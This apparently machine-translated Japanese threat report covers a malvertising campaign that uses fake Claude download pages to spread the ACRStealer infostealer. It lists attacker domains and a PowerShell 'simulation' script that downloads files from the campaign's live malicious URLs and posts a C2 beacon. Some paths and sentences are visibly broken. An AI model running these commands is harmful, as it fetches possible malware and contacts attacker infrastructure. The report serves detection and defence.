フォローする 
概要
脅威研究者は、ユーザーを偽のClaudeダウンロードページにリダイレクトする悪意のある広告キャンペーンを特定しました。このサイトは、被害者のオペレーティングシステムに応じて異なるペイロードを配信し、Windows感染チェーンはACRStealerの展開に至ります。調査官は、この活動を複数の侵害されたドメインと感染後に使用されるコマンド&コントロールサーバーに関連付けました。このキャンペーンは、難読化されたURLとPowerShellスクリプトに依存してペイロードの配信を完了します。
調査
アナリストは、最初の偽Claudeページから異なるドメインにホストされた複数のリダイレクトURLを通じて活動を追跡しました。感染チェーンの中で、ZIPアーカイブ、PowerShellスクリプト、JPEG画像がダウンロードされ、その後コマンド&コントロールドメインとのHTTPS通信が行われました。トラフィック分析により、感染後のネットワーク行動がACRStealerファミリーに関連するインフラストラクチャーと一致することが確認されました。
緩和策
組織はネットワークの周囲で特定された悪意のあるドメインとURLをブロックすべきです。広告トラフィックは、偽Claudeページや類似の偽装誘引を参照する悪意のある広告をフィルタリングすべきです。また、エンドポイント保護をACRStealer関連の行動や疑わしいPowerShell実行を検出するように構成すべきです。
対策
防衛担当者はコマンド&コントロールドメインへのアウトバウンド接続を監視し、 yw.enhanceblabber.cc 特定されたZIPアーカイブとPowerShellスクリプトのダウンロードをアラートすべきです。関連する活動を示すホストは、ACRStealerのアーティファクトの可能性についてフォレンジック収集を受け、侵害が確認された場合は隔離されるべきです。
攻撃フロー
この部分はまだ更新中です。通知を受け取るためにサインアップしてください
通知するシミュレーション実行
前提条件:テレメトリ&ベースライン事前チェックが合格している必要があります。
理由:このセクションでは、検出ルールをトリガーするよう設計された敵対者の技術(TTP)の正確な実行を詳述します。コマンドとナラティブは、識別されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。
-
攻撃ナラティブとコマンド:
- 最初の誘引: 攻撃者がリンクを含むフィッシングメールを送信します。
https://fairpoint29.com/被害者がリンクをクリックすると、偽のClaudeダウンロードページがロードされます。 - 悪意あるダウンローダーの実行: ページは自動的に
https://primemetricsa.com/1518925から偽装されたペイロードのダウンロードをトリガーします。 - 二次ペイロードの取得: ダウンロードされたスタブが
https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42dに接続して完全なACR Stealerバイナリを取得します。 - C2ビーコン: 実行されると、マルウェアは
https://i.ibb.co/Xx16sbMz/init-block.jpgにビーコンをポストします(画像ホスティングを利用した隠蔽的なC2技術)。
各ステップは、正確
なドメインandurlSigmaルールで定義された値に一致するプロキシログエントリを生成し、検出条件を満たします。 - 最初の誘引: 攻撃者がリンクを含むフィッシングメールを送信します。
-
回帰テストスクリプト:
# --------------------------------------- # ACR Stealer配布シミュレーション–トリガールール # --------------------------------------- # ステップ1:偽Claudeダウンロードページ(無害なGET) Invoke-WebRequest -Uri "https://fairpoint29.com/" -UseBasicParsing | Out-Null # ステップ2:ダウンローダーバイナリ(小さなファイルのダウンロードでシミュレート) Invoke-WebRequest -Uri "https://primemetricsa.com/1518925" -OutFile "$env:TEMPloader.bin" -UseBasicParsing # ステップ3:完全なペイロードの取得 Invoke-WebRequest -Uri "https://6ryuefl.creativecommunityinfo.art/Camel-91267b64-989f-49b4-89b4-9e015844d42d" ` -OutFile "$env:TEMPacr_steler.bin" -UseBasicParsing # ステップ4:C2ビーコン(トラフィックを偽装するために小さな画像をPOST) $body = [System.Text.Encoding]::UTF8.GetBytes("beacon") Invoke-WebRequest -Uri "https://i.ibb.co/Xx16sbMz/init-block.jpg" ` -Method Post -Body $body -ContentType "application/octet-stream" -UseBasicParsing | Out-Null # --------------------------------------- # シミュレーション終了 # --------------------------------------- -
クリーンアップコマンド:
# ダウンロードされたアーティファクトの削除 Remove-Item "$env:TEMPloader.bin" -ErrorAction SilentlyContinue Remove-Item "$env:TEMPacr_steler.bin" -ErrorAction SilentlyContinue # DNSキャッシュをフラッシュして残存エントリを避ける ipconfig /flushdns